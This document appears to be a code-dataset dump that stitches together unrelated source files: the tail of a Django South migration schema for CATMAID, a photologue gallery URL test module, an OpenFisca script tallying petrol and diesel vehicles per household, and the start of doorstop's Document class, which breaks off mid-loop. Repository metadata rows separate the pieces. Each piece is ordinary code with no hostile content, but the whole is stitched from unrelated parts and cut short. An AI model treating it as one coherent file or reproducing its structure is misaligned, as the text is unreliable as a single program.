'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'location_editor'", 'db_column': "'editor_id'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'review_time': ('django.db.models.fields.DateTimeField', [], {}),
'reviewer_id': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.log': {
'Meta': {'object_name': 'Log', 'db_table': "'log'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'freetext': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'operation_type': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.message': {
'Meta': {'object_name': 'Message', 'db_table': "'message'"},
'action': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'read': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'text': ('django.db.models.fields.TextField', [], {'default': "'New message'", 'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'title': ('django.db.models.fields.TextField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.overlay': {
'Meta': {'object_name': 'Overlay', 'db_table': "'overlay'"},
'default_opacity': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'file_extension': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_base': ('django.db.models.fields.TextField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'tile_height': ('django.db.models.fields.IntegerField', [], {'default': '512'}),
'tile_source_type': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'tile_width': ('django.db.models.fields.IntegerField', [], {'default': '512'}),
'title': ('django.db.models.fields.TextField', [], {})
},
'catmaid.project': {
'Meta': {'object_name': 'Project', 'db_table': "'project'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'stacks': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catmaid.Stack']", 'through': "orm['catmaid.ProjectStack']", 'symmetrical': 'False'}),
'title': ('django.db.models.fields.TextField', [], {})
},
'catmaid.projectstack': {
'Meta': {'object_name': 'ProjectStack', 'db_table': "'project_stack'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'orientation': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'translation': ('catmaid.fields.Double3DField', [], {'default': '(0, 0, 0)'})
},
'catmaid.regionofinterest': {
'Meta': {'object_name': 'RegionOfInterest', 'db_table': "'region_of_interest'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'height': ('django.db.models.fields.FloatField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'rotation_cw': ('django.db.models.fields.FloatField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'width': ('django.db.models.fields.FloatField', [], {}),
'zoom_level': ('django.db.models.fields.IntegerField', [], {})
},
'catmaid.regionofinterestclassinstance': {
'Meta': {'object_name': 'RegionOfInterestClassInstance', 'db_table': "'region_of_interest_class_instance'"},
'class_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'region_of_interest': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.RegionOfInterest']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.relation': {
'Meta': {'object_name': 'Relation', 'db_table': "'relation'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isreciprocal': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'uri': ('django.db.models.fields.TextField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.relationinstance': {
'Meta': {'object_name': 'RelationInstance', 'db_table': "'relation_instance'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.restriction': {
'Meta': {'object_name': 'Restriction', 'db_table': "'restriction'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'restricted_link': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassClass']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.segments': {
'Meta': {'object_name': 'Segments'},
'assembly': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']", 'null': 'True'}),
'cost': ('django.db.models.fields.FloatField', [], {'db_index': 'True'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'direction': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'origin_section': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'origin_slice_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'randomforest_cost': ('django.db.models.fields.FloatField', [], {}),
'segmentation_cost': ('django.db.models.fields.FloatField', [], {}),
'segmentid': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'segmenttype': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'}),
'target1_slice_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}),
'target2_slice_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}),
'target_section': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.segmenttoconstraintmap': {
'Meta': {'object_name': 'SegmentToConstraintMap'},
'constraint': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ConstraintsToSegmentMap']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'origin_section': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'segment_node_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'segmentid': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'target_section': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'})
},
'catmaid.settings': {
'Meta': {'object_name': 'Settings', 'db_table': "'settings'"},
'key': ('django.db.models.fields.TextField', [], {'primary_key': 'True'}),
'value': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'catmaid.slices': {
'Meta': {'object_name': 'Slices'},
'assembly': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']", 'null': 'True'}),
'center_x': ('django.db.models.fields.FloatField', [], {'db_index': 'True'}),
'center_y': ('django.db.models.fields.FloatField', [], {'db_index': 'True'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'flag_left': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'flag_right': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_x': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'max_y': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'min_x': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'min_y': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'node_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'sectionindex': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'size': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'slice_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'}),
'threshold': ('django.db.models.fields.FloatField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.stack': {
'Meta': {'object_name': 'Stack', 'db_table': "'stack'"},
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'dimension': ('catmaid.fields.Integer3DField', [], {}),
'file_extension': ('django.db.models.fields.TextField', [], {'default': "'jpg'", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_base': ('django.db.models.fields.TextField', [], {}),
'metadata': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'num_zoom_levels': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'resolution': ('catmaid.fields.Double3DField', [], {}),
'tile_height': ('django.db.models.fields.IntegerField', [], {'default': '256'}),
'tile_source_type': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'tile_width': ('django.db.models.fields.IntegerField', [], {'default': '256'}),
'title': ('django.db.models.fields.TextField', [], {}),
'trakem2_project': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'catmaid.stacksliceinfo': {
'Meta': {'object_name': 'StackSliceInfo'},
'file_extension': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slice_base_path': ('django.db.models.fields.TextField', [], {}),
'slice_base_url': ('django.db.models.fields.TextField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"})
},
'catmaid.textlabel': {
'Meta': {'object_name': 'Textlabel', 'db_table': "'textlabel'"},
'colour': ('catmaid.fields.RGBAField', [], {'default': '(1, 0.5, 0, 1)'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'font_name': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'font_size': ('django.db.models.fields.FloatField', [], {'default': '32'}),
'font_style': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'scaling': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'default': "'Edit this text ...'"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'catmaid.textlabellocation': {
'Meta': {'object_name': 'TextlabelLocation', 'db_table': "'textlabel_location'"},
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'textlabel': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Textlabel']"})
},
'catmaid.treenode': {
'Meta': {'object_name': 'Treenode', 'db_table': "'treenode'"},
'confidence': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'treenode_editor'", 'db_column': "'editor_id'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'children'", 'null': 'True', 'to': "orm['catmaid.Treenode']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'radius': ('django.db.models.fields.FloatField', [], {}),
'review_time': ('django.db.models.fields.DateTimeField', [], {}),
'reviewer_id': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'skeleton': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.treenodeclassinstance': {
'Meta': {'object_name': 'TreenodeClassInstance', 'db_table': "'treenode_class_instance'"},
'class_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'treenode': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Treenode']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.treenodeconnector': {
'Meta': {'object_name': 'TreenodeConnector', 'db_table': "'treenode_connector'"},
'confidence': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'connector': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Connector']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'skeleton': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']"}),
'treenode': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Treenode']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'color': ('catmaid.fields.RGBAField', [], {'default': '(0.9239775287034722, 1.0, 0.9894981201919059, 1)'}),
'display_stack_reference_lines': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'independent_ontology_workspace_is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'inverse_mouse_wheel': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_cropping_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_ontology_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_segmentation_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_tagging_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_text_label_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_tracing_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['catmaid']
| agpl-3.0 | 2,328,740,279,306,109,400 | 72.492604 | 190 | 0.546547 | false | 3.787816 | false | false | false |
petry/django-photologue-old | photologue/tests/views_gallery.py | 1 | 1840 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import datetime
from django.core.urlresolvers import reverse
from photologue.tests import helpers
from photologue.tests.helpers import RequestTest
YEAR = datetime.now().year
MONTH = datetime.now().ctime().split(' ')[1].lower()
DAY = datetime.now().day
class RequestGalleryTest(RequestTest):
def setUp(self):
super(RequestGalleryTest, self).setUp()
self.gallery = helpers._create_new_gallery(
name='Fake Gallery', slug='fake-gallery')
def tearDown(self):
super(RequestGalleryTest, self).tearDown()
self.gallery.delete()
def test_archive_gallery_url_works(self):
self.assertUrl(
reverse('pl-gallery-archive')
)
def test_paginated_gallery_url_works(self):
self.assertUrl(
reverse('pl-gallery-list', kwargs={'page': 1})
)
def test_gallery_works(self):
self.assertUrl(
reverse('pl-gallery', kwargs={'slug': 'fake-gallery'})
)
def test_archive_year_gallery_works(self):
self.assertUrl(
reverse('pl-gallery-archive-year',
kwargs={'year': YEAR}
)
)
def test_archive_month_gallery_works(self):
self.assertUrl(
reverse('pl-gallery-archive-month',
kwargs={'year': YEAR, 'month':MONTH}
)
)
def test_archive_day_gallery_works(self):
self.assertUrl(
reverse('pl-gallery-archive-day',
kwargs={'year': YEAR, 'month':MONTH, 'day': DAY}
)
)
def test_detail_gallery_works(self):
self.assertUrl(
reverse('pl-gallery-detail',
kwargs={'year': YEAR, 'month':MONTH, 'day': DAY, 'slug': 'fake-gallery'}
)
) | bsd-3-clause | -3,286,291,012,856,413,000 | 27.765625 | 88 | 0.577174 | false | 3.923241 | true | false | false |
LouisePaulDelvaux/openfisca-france-data | openfisca_france_data/input_data_builders/build_openfisca_indirect_taxation_survey_data/step_0_2_homogeneisation_vehicules.py | 1 | 4481 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# OpenFisca -- A versatile microsimulation software
# By: OpenFisca Team <[email protected]>
#
# Copyright (C) 2011, 2012, 2013, 2014, 2015 OpenFisca Team
# https://github.com/openfisca
#
# This file is part of OpenFisca.
#
# OpenFisca is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# OpenFisca is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
from openfisca_survey_manager.survey_collections import SurveyCollection
log = logging.getLogger(__name__)
from openfisca_france_data import default_config_files_directory as config_files_directory
from openfisca_france_data.temporary import TemporaryStore
temporary_store = TemporaryStore.create(file_name = "indirect_taxation_tmp")
#**************************************************************************************************************************
#* Etape n° 0-2 : HOMOGENEISATION DES DONNEES SUR LES VEHICULES
#**************************************************************************************************************************
#**************************************************************************************************************************
#
#
# * DONNEES SUR LES TYPES DE CARBURANTS
def build_homogeneisation_vehicules(year = None):
"""Compute vehicule numbers by type"""
assert year is not None
# Load data
bdf_survey_collection = SurveyCollection.load(
collection = 'budget_des_familles', config_files_directory = config_files_directory)
survey = bdf_survey_collection.get_survey('budget_des_familles_{}'.format(year))
if year == 1995:
vehicule = None
# * L'enquête BdF 1995 ne contient pas d'information sur le type de carburant utilisé par les véhicules.
if year == 2000:
vehicule = survey.get_values(table = "depmen")
kept_variables = ['ident', 'carbu01', 'carbu02']
vehicule = vehicule[kept_variables]
vehicule.rename(columns = {'ident': 'ident_men'}, inplace = True)
vehicule.rename(columns = {'carbu01': 'carbu1'}, inplace = True)
vehicule.rename(columns = {'carbu02': 'carbu2'}, inplace = True)
vehicule["veh_tot"] = 1
vehicule["veh_essence"] = 1*(vehicule['carbu1'] == 1) + 1*(vehicule['carbu2'] == 1)
vehicule["veh_diesel"] = 1*(vehicule['carbu1'] == 2) + 1*(vehicule['carbu2'] == 2)
if year == 2005:
vehicule = survey.get_values(table = "automobile")
kept_variables = ['ident_men', 'carbu']
vehicule = vehicule[kept_variables]
vehicule["veh_tot"] = 1
vehicule["veh_essence"] = (vehicule['carbu'] == 1)
vehicule["veh_diesel"] = (vehicule['carbu'] == 2)
if year == 2011:
try:
vehicule = survey.get_values(table = "AUTOMOBILE")
except:
vehicule = survey.get_values(table = "automobile")
kept_variables = ['ident_me', 'carbu']
vehicule = vehicule[kept_variables]
vehicule.rename(columns = {'ident_me': 'ident_men'}, inplace = True)
vehicule["veh_tot"] = 1
vehicule["veh_essence"] = (vehicule['carbu'] == 1)
vehicule["veh_diesel"] = (vehicule['carbu'] == 2)
# Compute the number of cars by category
if year != 1995:
vehicule = vehicule.groupby(by = 'ident_men')["veh_tot", "veh_essence", "veh_diesel"].sum()
vehicule["pourcentage_vehicule_essence"] = 0
vehicule.pourcentage_vehicule_essence[vehicule.veh_tot != 0] = vehicule.veh_essence / vehicule.veh_tot
# Save in temporary store
temporary_store['automobile_{}'.format(year)] = vehicule
temporary_store.close()
if __name__ == '__main__':
import sys
import time
logging.basicConfig(level = logging.INFO, stream = sys.stdout)
deb = time.clock()
year = 1995
build_homogeneisation_vehicules(year = year)
log.info("step 0_2_homogeneisation_vehicules duration is {}".format(time.clock() - deb))
| agpl-3.0 | -2,859,668,005,457,323,500 | 38.27193 | 123 | 0.611124 | false | 3.443846 | false | false | false |
elewis33/doorstop | doorstop/core/document.py | 1 | 24092 | """Representation of a collection of items."""
import os
from itertools import chain
from collections import OrderedDict
from doorstop import common
from doorstop.common import DoorstopError, DoorstopWarning
from doorstop.core.base import (add_document, edit_document, delete_document,
auto_load, auto_save,
BaseValidatable, BaseFileObject)
from doorstop.core.types import Prefix, UID, Level
from doorstop.core.item import Item
from doorstop import settings
log = common.logger(__name__)
class Document(BaseValidatable, BaseFileObject): # pylint: disable=R0902
"""Represents a document directory containing an outline of items."""
CONFIG = '.doorstop.yml'
SKIP = '.doorstop.skip' # indicates this document should be skipped
INDEX = 'index.yml'
DEFAULT_PREFIX = Prefix('REQ')
DEFAULT_SEP = ''
DEFAULT_DIGITS = 3
def __init__(self, path, root=os.getcwd(), **kwargs):
"""Initialize a document from an exiting directory.
:param path: path to document directory
:param root: path to root of project
"""
super().__init__()
# Ensure the directory is valid
if not os.path.isfile(os.path.join(path, Document.CONFIG)):
relpath = os.path.relpath(path, root)
msg = "no {} in {}".format(Document.CONFIG, relpath)
raise DoorstopError(msg)
# Initialize the document
self.path = path
self.root = root
self.tree = kwargs.get('tree')
self.auto = kwargs.get('auto', Document.auto)
# Set default values
self._data['prefix'] = Document.DEFAULT_PREFIX
self._data['sep'] = Document.DEFAULT_SEP
self._data['digits'] = Document.DEFAULT_DIGITS
self._data['parent'] = None # the root document does not have a parent
self._items = []
self._itered = False
def __repr__(self):
return "Document('{}')".format(self.path)
def __str__(self):
if common.verbosity < common.STR_VERBOSITY:
return self.prefix
else:
return "{} ({})".format(self.prefix, self.relpath)
def __iter__(self):
yield from self._iter()
def __len__(self):
return len(list(self._iter()))
def __bool__(self): # override `__len__` behavior, pylint: disable=R0201
return True
@staticmethod
@add_document
def new(tree, path, root, prefix, sep=None, digits=None, parent=None, auto=None): # pylint: disable=R0913,C0301
"""Internal method to create a new document.
:param tree: reference to tree that contains this document
:param path: path to directory for the new document
:param root: path to root of the project
:param prefix: prefix for the new document
:param sep: separator between prefix and numbers
:param digits: number of digits for the new document
:param parent: parent UID for the new document
:param auto: automatically save the document
:raises: :class:`~doorstop.common.DoorstopError` if the document
already exists
:return: new :class:`~doorstop.core.document.Document`
"""
# TODO: raise a specific exception for invalid separator characters?
assert not sep or sep in settings.SEP_CHARS
config = os.path.join(path, Document.CONFIG)
# Check for an existing document
if os.path.exists(config):
raise DoorstopError("document already exists: {}".format(path))
# Create the document directory
Document._create(config, name='document')
# Initialize the document
document = Document(path, root=root, tree=tree, auto=False)
document.prefix = prefix if prefix is not None else document.prefix
document.sep = sep if sep is not None else document.sep
document.digits = digits if digits is not None else document.digits
document.parent = parent if parent is not None else document.parent
if auto or (auto is None and Document.auto):
document.save()
# Return the document
return document
def load(self, reload=False):
"""Load the document's properties from its file."""
if self._loaded and not reload:
return
log.debug("loading {}...".format(repr(self)))
# Read text from file
text = self._read(self.config)
# Parse YAML data from text
data = self._load(text, self.config)
# Store parsed data
sets = data.get('settings', {})
for key, value in sets.items():
if key == 'prefix':
self._data['prefix'] = Prefix(value)
elif key == 'sep':
self._data['sep'] = value.strip()
elif key == 'parent':
self._data['parent'] = value.strip()
elif key == 'digits':
self._data['digits'] = int(value)
# Set meta attributes
self._loaded = True
if reload:
list(self._iter(reload=reload))
@edit_document
def save(self):
"""Save the document's properties to its file."""
log.debug("saving {}...".format(repr(self)))
# Format the data items
data = {}
sets = {}
for key, value in self._data.items():
if key == 'prefix':
sets['prefix'] = str(value)
elif key == 'sep':
sets['sep'] = value
elif key == 'digits':
sets['digits'] = value
elif key == 'parent':
if value:
sets['parent'] = value
else:
data[key] = value
data['settings'] = sets
# Dump the data to YAML
text = self._dump(data)
# Save the YAML to file
self._write(text, self.config)
# Set meta attributes
self._loaded = False
self.auto = True
def _iter(self, reload=False):
"""Yield the document's items."""
if self._itered and not reload:
msg = "iterating document {}'s loaded items...".format(self)
log.debug(msg)
yield from list(self._items)
return
log.info("loading document {}'s items...".format(self))
# Reload the document's item
self._items = []
for dirpath, dirnames, filenames in os.walk(self.path):
for dirname in list(dirnames):
path = os.path.join(dirpath, dirname, Document.CONFIG)
if os.path.exists(path):
path = os.path.dirname(path)
dirnames.remove(dirname)
log.trace("skipped embedded document: {}".format(path))
for filename in filenames:
path = os.path.join(dirpath, filename)
try:
